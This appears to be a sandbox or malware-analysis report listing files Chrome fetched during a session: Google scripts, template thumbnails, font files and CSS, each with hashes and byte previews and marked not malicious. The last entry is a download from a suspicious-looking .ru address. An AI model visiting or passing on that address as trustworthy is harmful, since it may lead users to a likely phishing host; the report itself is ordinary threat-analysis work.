                                                                                                                                                                                                                                        Preview:"use strict";this.default_SocialPeopleHovercardUi=this.default_SocialPeopleHovercardUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x6f00c00, 0x0, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var ea,aaa,Ca,baa,Fa,Ua,mb,tb,eaa,Ib,Ob,Ub,Xb,Zb,cc,faa,gaa,nc,iaa,vc,wc,kaa,Ic,Jc,laa,ad,cd,Xc,Yc,hd,od,qd,rd,ld,qaa,Od,Pd,raa,Rd,Td,Wd,Kd,Ld,saa,le,ke,uaa,me,vaa,Fe,Ge,Le,Ve,Ye,jf,gf,kf,C,wf,Af,Nf,Sf,Caa,$f,Daa,eg,Eaa,Faa,Gaa,Haa,jg,ng,qg,Jaa,Kaa,Laa,Maa,Naa,Oaa,Lg,Paa,Saa,Taa,gh,Yaa,Waa,xh,bba,Ch,Fh,dba,eba,Hh,iba,jba,Zh,$h,kba,lba,mba,nba,pi,pba,si,qba,rba,Gi,Hi,tba,uba,zba,wba,xba,yba,Aba,Ji,zi,Ti,Ui,Fba,Hba,Iba,Yi,Kba,Lba,
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                        Entropy (8bit):7.737931820487441
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                                                                                                                                                                                                        MD5:FC3B7BBE7970F47579127561139060E2
                                                                                                                                                                                                                                        SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                                                                                                                                                                                        SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                                                                                                                                                                                        SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 144 x 144, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):479
                                                                                                                                                                                                                                        Entropy (8bit):6.907722555270069
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:6v/70f7XnKN+URXKLaFR4N8iY6w8IzuiWOZBy5VaJxSeHNRPXyF:9fTKpXKceN8iYeeZ85CSef/e
                                                                                                                                                                                                                                        MD5:EBEE417C131CC534EBE8F665BD588936
                                                                                                                                                                                                                                        SHA1:2EBD6063F631D8E596858CCBD2A545F7E6061DB8
                                                                                                                                                                                                                                        SHA-256:80C3885811A42DA7C6E7B9B811800AF8105E8F310C7ABDD59BF93AA8C4FBF769
                                                                                                                                                                                                                                        SHA-512:06F23550B06D2D49147DC770E0E66857C90FEC713D30F85C258A2ED12BBB13C9DB2D83C22F4A62460E991FEB008064B3886E2F19F9F3882DA115A21584D01F9A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR...................NPLTE...@..B..C..B..B...g.@..A...g.D..B..@..B..A..B..B........B..B..C..@..B..B..A....T....tRNS.8....o$..<.(.K.....W...S.:.....&IDATx......1..Q.(.|.7.....g*x?. .....U...|..-...:.P{.f....hH..X.K..\..A.E...\."H..@....D..&2....$.< E...".... ].......t.".t..RD~...A....E:H..A.H.)"?H.. A..i"?H..9@....... @?.:V..../...bS.......# @................./"... @...r... @.............].Z..].Z....il..u....GE.M.]EU.=-....v...q......=.*.-.[. .....IEND.B`.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):62732
                                                                                                                                                                                                                                        Entropy (8bit):7.99366744906437
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:NC97sPjy7md+1n5Hqw6Rx072SA6dJY4SOOreetgS7:NC97sPjy7md+149b6/SO9etgm
                                                                                                                                                                                                                                        MD5:FB77E4D2FCE5E4591C3417F9FDD1A1E1
                                                                                                                                                                                                                                        SHA1:2FF14C32E66A08A800642B7422E16F74ACDF68EE
                                                                                                                                                                                                                                        SHA-256:43B2DABA8D0AF31C79835FA37F533E91A03E283C97FBBC190AFB44F900B3D376
                                                                                                                                                                                                                                        SHA-512:B1ADBC2EB5F913D0AEF965BF794D9D779E6631079A8716F23A6631D9E50FABBE03B2BB763D40DE4A7A188E3EA2A7E2E7D012E5120DC015B3C3F2B37EFE34C279
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1dKzM7JOYUcXkDNPMuJ2uVke0nj8M0mlCaOpjUagyWxM_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...1........_Y+.zB...G..... ,.a.....@eg...6r......8q...$m....1.}.........|Tfn.....^.'.FO.l....>.{..JZi4z53.........aY.,.c.^!..".r..e.....B..Rh....,.'|..ih...#Y.I..5.R)....2.......DK..o.......W]J=h.M.....)).......OZ.R#"......y.bWD.........FBe.qL.3ct.......MG"E..z..+95]Q^ZXX..jK_...\w.....IH....(H2....Hb........mmmUUU.(.w..a..?!.K..4...X.iw(..y..,....g`}G.o.f.+. K`..e........M.b..I.M.8~..@o..y../x ......M..DE.h..P..6.M.Y.....0...........].$1....Y......(...~.`<~..?.O!&.Q...5.%x.........(Lo>Cn..K...X...........lbg2.@.....O;s...{.~.-.}=..a...H.......M.c.j._RV.J.v.w."..+.F.c##.=.....h.R..5X)a.U?.J.....r...........9.b..h6...lWJ...>....\.iI,v.h.S.+..Tn.e(.`K.....TzN.p.s]]]tZ..U/...)Oui..........uk7..."..e.J..H..1~..S(....Cn8.S%7.p..j..wb..YBi.H$"\.b....G.....L.E.l?s....".O...djY.n>..h8\./........N.[....0:.L....][W.]....N.B.u+..UdU....."J.mY.$cJ.M..J.......f.g.......w...._.s.2w..=.KAB.C.:....i.X.b.....j..(".
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):46075
                                                                                                                                                                                                                                        Entropy (8bit):7.984118762106573
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ZwBQ2opPipAymIFto7EEZ1lYRzRXbm/OAiMul4cAcYt8uZ90uyne:ZwBBopqgZYzRrKOAAM8Mfye
                                                                                                                                                                                                                                        MD5:8CB626DFAFFFD6AADDFC69748507239E
                                                                                                                                                                                                                                        SHA1:49E3EFCA4C30967FBFC26E36A66CEC676D35FC78
                                                                                                                                                                                                                                        SHA-256:C729C1A9CBC6269F50F5DF4D32B3F87D4E6B227BA546FA2537D44CA51ED536F6
                                                                                                                                                                                                                                        SHA-512:7546722D7B673EDB55524F2F3E330D9095A6A2D9E35FE1ACF478C8B6E1FCF00E3BA1D7B9EA6C60E40C717AA6F0B8ABE490382EA4CB2B77468A37B4D104E26F5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx................0=. ,@X..... ,.a....f.\G...?...a<f......13C6v....:ff.+.0.3.~.,+z5.%....G.....4..o.#....k.[4.K..kr........h.cj..5.1...M.+.&....F...S.....q6...[F.8}L!...V....X]}{_......U..-..++'UW3N.Be%m..S(..m.Vk.2.D.im..;.;.d....m>.-?:...X.......U...O....L.......I...n.\[3....`.w.I.c......gs8d.YSjk.*g...4.j......b.AVw...o..B..Bq....b......^,v..cBg...{...Y4/..).......+...8.._...5"..0..D.ZH}|.C7.5.b!(#.l$<e.......>.. .hY.EW.rC./.e....k....[........'.y.!_..v...J3...07..~w.x:..........>......!...|.w...`..d.M|..SZG....).........}..b.....a....D;....tN46.5..........j"..f.........p..f|..-..).,...cZ..}...vN..O|....`P..{.....CLy...h.;f.[g.... rbe...s.m..4.S.CP.<...%.BD1d......:b1-..............i.C#.hC6>........]...,...a...r.... @j..(X..X.N+9.E%._qD.]2|.O{>P.b.....K........V.=.4.[d...!.7P...hF......vbk>........K.*........#w..u.....<.....F..S..Y...D`...w..D44..a..o....U..@...o....-O(V<...........f.0
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):55678
                                                                                                                                                                                                                                        Entropy (8bit):7.971857120673013
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:+VNce7AVhdSHiNTK1JyuyQtBkNBeGSDYqWjqFwCtm:+VNcesMeK/bKKDoqOCtm
                                                                                                                                                                                                                                        MD5:421BAE511B172E6D4B6C11CBFE93BE48
                                                                                                                                                                                                                                        SHA1:EBC4F49C015D4BB3D697D20BFC24CEB291C89A6D
                                                                                                                                                                                                                                        SHA-256:B382AD6D1BBF687024711C529CDB1486A7C87B1284E7D4EF545FD8DE93FF84B7
                                                                                                                                                                                                                                        SHA-512:3FF79D88F030DE4E957E73128119419AEC3F645A0A26C17766BAA87ADF1F184A8173304F330E3A176323D6BB5B6FBAF70CC72A7BF8E1870F7D4125BF152FE81B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/19hxhDODb9jZXroTuSNn4c3dl8GAmL-Te6xVoYw1TkEc_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(...EIDATx...1..0....@.+......0..;.....}.O../,...D\(.... ,.a........a...@X..... ,@X..... .....@X..... ,@X..... ,.a............@X..... ,@X......6.C.a.V.1..y._l..j1Fa=p]W.M.T>Y.%..( ..}...KX ...SJ.j ,..m]Wa.......<..@X ..8.9.ga....6l())qvv......www....c....Q...<x....$I..$$...$. ._ ...J(...T.ID@.)..RA.IT..U....:H..=;wwv...).J......d..v.]......-.K..h4......vK...u.P.%.Z..r.l6..\.\....cX.V+......@.~.B..l.F..N............l..P4...s..&.j..D"..~:.....V*..L&s8....~O.6.."..N.....|.^...F.....?..v....5....H$F.1.LN.S.SH.W.~._.._.X.AK$....1....cX.r......<.q/'..V...^.w.......u.z.NbR...j...2@L.J.J..aA.v..2..h........:...X..'...l6...A.P.............o..pM.aAi.@.&....N.....j.Jv..Jpd,........y.......z"P...F..B!2-..u.T]...x...A..P*../.V....<L+..>.jX...5..f.R).03,l]U*....... ..#.ct.N..%...zB.6..6.t.!'..x.|..........8n._..|d..b!.&_.n2.H.4.+y<....<....d.a..s.X..o....A....}..@@......DI.$Q.. . @ !.$....U.D...e...=...r...........b....|<|...O.../.LF
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3774
                                                                                                                                                                                                                                        Entropy (8bit):5.436312225868273
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:AOOEa9wOOEa2FZOhOOEatOOEaqJc+udOOEadZNtOOpa9wOOpa2FZOhOOpatOOpaj:Y9oDTPCmde9BDWyCjdw
                                                                                                                                                                                                                                        MD5:CC5C08E92B60141A3DE5E377265AF95C
                                                                                                                                                                                                                                        SHA1:F083AB76A6DD11169982595A9801CAA59DA9E380
                                                                                                                                                                                                                                        SHA-256:9C143B0D49C00D71DE9414D8461E0C25B400FCFF8FA9C7386ECC10D64A69B309
                                                                                                                                                                                                                                        SHA-512:05C6EBECDD38BFD8764316C4499F908D2056F9B7C0099C2B80D9A00C4654C88583E5708ED97F9E6EFBB4024EABF5ED9055820F1841FDE7315F5641CF90FE4E0D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.googleapis.com/css2?family=Montserrat:wght@400;700&display=swap
                                                                                                                                                                                                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 55180, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):55180
                                                                                                                                                                                                                                        Entropy (8bit):7.995663305053901
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:v1V0wmxyewLmc7wfAR6+p85r0SonYL2hi8ReWsnK4FF:v1VhmxDu37lR6+p8aSpLmiffR
                                                                                                                                                                                                                                        MD5:FFB453D1B8E953CFA9719644D99A20EF
                                                                                                                                                                                                                                        SHA1:BDCB8968E7DDDA2229D9404EDFFCD591CE79BE91
                                                                                                                                                                                                                                        SHA-256:309E5B3CD957F7BA866D91286B645D8F3AEBA04EAD4B16F5CC5A13CB4B237880
                                                                                                                                                                                                                                        SHA-512:41B779B785CDFEE84064A840D9FD7327B7AD1056EDD24E22F1B00F3CC943FCBCDBDA07A60FCD0AEE06D5294D0177617A4BB2AEB7B3BF87E4DCA42D2AE8D36AE7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQiAo.woff2
                                                                                                                                                                                                                                        Preview:wOF2.................. ..........................f...&..R.`?STATZ.....~.................6.$.... ..\. ..N[..q...E...Y....^....j.t..=..2}e..E...d..O. ....w$...K:.i...27Aq../..#....V.s..8...J....~.>....(F.X*..m....,.^.E.^....K.R..U........)s.KK..... .T...`.g..qX.......{..1.H'V...S.Zo.x/..^N.....q..k.U.$Z.Io....0..... ..m..!..........BII.L.h"+L9...>N..T....I..&....*G.I.h.o4...Q...S....i{.Z..d..).._........d.xlNR"Z.g..g..!.mv%..K.....O9.T:[V.{T.w:....J..OOP..".8...y....H.&.c,....v................c.`.`,.e..F...0....`~?.H......`!H... Q.Z..'...[.(F......E+"."Y..bY,.1"Gn(QRz>......w...^4.r....w.u........"Y..z...E.RW.E. ...@.....8>... ..4....o..~...$...D.U....r...G4...\H.`../f......1...a."-b.:^Z..<1..}_L..Zi....4U....a...<.....z........vy...CP.m....'KDB!T..H...R.F.?........v..#...N..(.....B...........@...JR.v.X....f..51.}N.r.b.r.j......@...@.W......Ca.(...61X.`H...WiM#~.I...F.....$.Sv.lNTO?....I.i.......s.m..7..&.T.j.5...zN.O1[g.&X....:.C.E..B.....IU.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3274), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3274
                                                                                                                                                                                                                                        Entropy (8bit):5.391262534936802
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:mtTBrcIGsrcIGaws15Tws15sCZUxzVKLEJEco7+be0OgA5bJywF1zZUvGCUvGU7W:mtOTUb1db1ClNY5co7shdiUYVqig7OW
                                                                                                                                                                                                                                        MD5:C8D3FC097E4A4526D3855AA74647F884
                                                                                                                                                                                                                                        SHA1:EE791BE5668AEDDA1C1D65FF2876BB3BF34C7BEE
                                                                                                                                                                                                                                        SHA-256:EB760AA3D3CE1EFE8DDBC8C006F228FC1A9302C547764B5DF3CEA3BEB75CFE0F
                                                                                                                                                                                                                                        SHA-512:0A6E3C762C2B381EB8B079F082A11B92E06F99EEB5DBD03A9C3315F533FA2174474C248B87C4E42FE8CF2D07DD09BD2FA8505F9CEEE29FCAA685298E12EBD57A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.L8bgMGq1rcI.L.W.O/m=qcwid/excm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/ct=zgms/rs=AA2YrTuS2lB4IRlJuMaoM0QgSoTOihj9Bg"
                                                                                                                                                                                                                                        Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):78452
                                                                                                                                                                                                                                        Entropy (8bit):7.991910064665744
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:lfByokUZGEsfhPwBJWNqssPxri3BoL6z+Rq6k3ZF9tD43sd0cqTbdeO:lfBMkGE6hPmcNqsKE3iQ+vQ73D4Xc2bH
                                                                                                                                                                                                                                        MD5:BB30C72F623BC317BE9BA68E709E5817
                                                                                                                                                                                                                                        SHA1:EA38C1989EC1156AC9C464638D10C9380EF251DA
                                                                                                                                                                                                                                        SHA-256:C201FC3043928CBE7541790E44213B7C7C9ED77417586A3E9A5D013A05479FB7
                                                                                                                                                                                                                                        SHA-512:DBCFFAD0B8866E9364258404F772631B2D7A6F3E41C9C3E1F8BFDA7440AA68C73696E6F2F5F00C673B37855C54B1471A0018830C1CE34B0235B315D48A3238F9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..2;IDATx......... ...S...!...0...........@X..... ,@X..... ,.a............@X..... ,.a........a...@X..... ,@X..... ,.a....V.%..4(..0.(=F......^.'.!...P .%D*!.J5cv....j....;...?]....A....TiDY..~Q.\.L..9.s..o..9..&.u.}..L....eY.;....0.\. . .$..1M.[.....y..m.\..Y.M.t..c.6..k.4q.[..).....C..m.(.u]..a.......m[..u...y?v.@.A0....;.....$..B. .J."@... .B...^.w...D/q..L...~.H..r..k..A..#I2I.x.G}...b..M5M........r..,.eYY..+..4MO...]......~..y..8..q.. ....p8..._.|>S..iZUUu]..Gx.\...c...4..(...Zn..a..?.....,L.<ia.i.<..b.,cwb.g.v*...m...8-.J......:.....a.g9...(n...}.GQ4...$.., ."<....`.DUUa..yS|.....G.3.....a..'.@....*....!.R..!.).R..%(..(..PD..P.R ..AJ..+..u....R...yo...t:..|N...D"..#4".d2A...h.Z./...h.}9..^..X}:.......f.k...+......F.N.....#.....j.J......r....M.R.....Bq..o..q.....r.n.......o..q<...C.d2..G/R..t:..f%..jE...".......)...v..p8..D....v..(......2f.|X..C.......n7.._..IT....*...#5,l.X.. .2.G`.a2. ....|&.X,.<a..\n..C...v;..P(..G..J....3.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 56400, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):56400
                                                                                                                                                                                                                                        Entropy (8bit):7.995762971161193
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:be75r4KjZmdlgmzLW55/T7hTqUQJAcKhzOj5Qn:be7OCmrzy5lhuUQJAcAzF
                                                                                                                                                                                                                                        MD5:89504DB9C154014CBF26C05734DDF3BF
                                                                                                                                                                                                                                        SHA1:444A3053DB72793088DEB484FF320D324058ED11
                                                                                                                                                                                                                                        SHA-256:AEC3C066BE05CA60A6627DBBD61CAA9F8BBACF17905A481108C1675AF298D03D
                                                                                                                                                                                                                                        SHA-512:EFE8C37F8163298D690A61EB7B690564EBAB97C5B0F991BE219E9549FA282887CB4159B5D0936B68A3AFDCBDCF18A1785F5ABF169587F3C0791FCC060280DBAE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/spectral/v14/rnCr-xNNww_2s0amA-M7.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......P.......`..............................x........`.....d..............x..6.$..l. ..4..K..o[.R...qm.:wc..B.!...Vb.y.g".c7.ahY.c...t2.Q..@Om..m@%}..9.........Lb....n@.R..Gk...;!2.....;.*;.R\..&...Ljnbl...q.u\..2,{....fx..n._.F.d......6.m........-.w.Z*;.Fd..<.`c0.r...\FwB.2.4...$..+=...$&NNR...gOo~.'a.h.37*]..m.K...W.|..R2......M5.......6\R.j..7p.G-...X.1..A.............L......tzX.g....b....o..h.......gL....F..K......8.:......d.k}.FOr.....Ie..p..]......F'=G.lQ&...07....eA...OM.:g.LX....R.M.M.K{.)1d..?aF.3..=.R..S.N.*J..!.T.C(e].......>+.xA.......71....lq....)%.........Y.C...|...|...@5.x....v7.n.l.6J.Hl.@.Lj.{@{@....sN.z...Tj4........-...FX....n...sp<F".7<.6....w..w.\..H...*.....10.T.Y....f.6cQn...t.r...."...&..>y...X=...onr........O..I....'....@0.....].....?.....`.v...7.pBY..D.p.d..>..X.3UnJ..\L.|..5..,.....'@.....\....[.-!a.$...J.y...`@(..(...*V....o.n=......_#..Q...O.N.6@.....)..h.5cn....k...b....B^.B..(......BQ....p..+.._
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):74388
                                                                                                                                                                                                                                        Entropy (8bit):7.990343167436823
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:6JUJjlRtuKup1mSzaYbT+7nwJg2ukuurFU1aHAErZHND:PjlPunp1mJi9uRD1stD
                                                                                                                                                                                                                                        MD5:5822BBB50FB609989F62A41F75E37470
                                                                                                                                                                                                                                        SHA1:A40A1560ADFC4C967FE2D4131996B0E7BAE74513
                                                                                                                                                                                                                                        SHA-256:5FFB14B2F0A80403BD0166FAD0AAB68607FE36CB1DE619DC9052AA02916E308B
                                                                                                                                                                                                                                        SHA-512:8DE7398017A8728A42F17BD27D1343E52E55C8407C07B5D220064CF254E8FD93BF21560FED9504C97E04A34FEAD2D18DB2857F90ED007305C52B450679D746E4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1up_CNRJGvoKuhTKp3sWH7GDckf7BbAp03sjHoSUjUiM_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(.."[IDATx.....0.D.Pq$tC.tCBk.....J.[.{E....Ed....`..@.....,..9..+..p.]3...).=5.....`.;u.Z...,2.j..P...G....a...@.....gw.(A..zK.\#8..J.[..lj%Xp...v..H.D..eVU....y<........c.r.L.lYRw.e.c0......L/..B."..Pa...[TIH..p.....;B ....?..6.Z.Rd`b.....5......Wj...k.A...6.Z....p....S.n\>..V.........#.B.m....&......d.+H..... P..K...7.S...........w..A*V.......J..Y.p...}......Y.QI.x.H......*v..Z....ae...H..e......v..p.....8..dD0.CI.67.B..0sH.;9rd.yB...1..e..Z.....8..j...Gcu...WO<...=.L...s.u... ....Es.....(...F.....R..b............}..].*..Z...j....rE.e!...O.....B?....]<....ze&.P@.9N)...2..Vs.U.^.qX.af(.....zBDeY.cD8F....x..7.g.L...x.(.m.+.?.Z%......}.g..j.T....#D....M....5z;.L....)e.....]..[..O~k,..JJ..}.....5........;SS.Z...l....7.w.X.333..^8{...~)$....0ti.s......|....9.]....P.>=..j..;rw...?zH.NI.=v......=..!.4.9.&J.S.J..0.8.9.>..M...............1..&..82x.?[.s..{W.....g...........d.Sg7~....L.........]b<.......UI..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://3iff5.biijvi.ru/rand@a8huj
                                                                                                                                                                                                                                        Preview:1
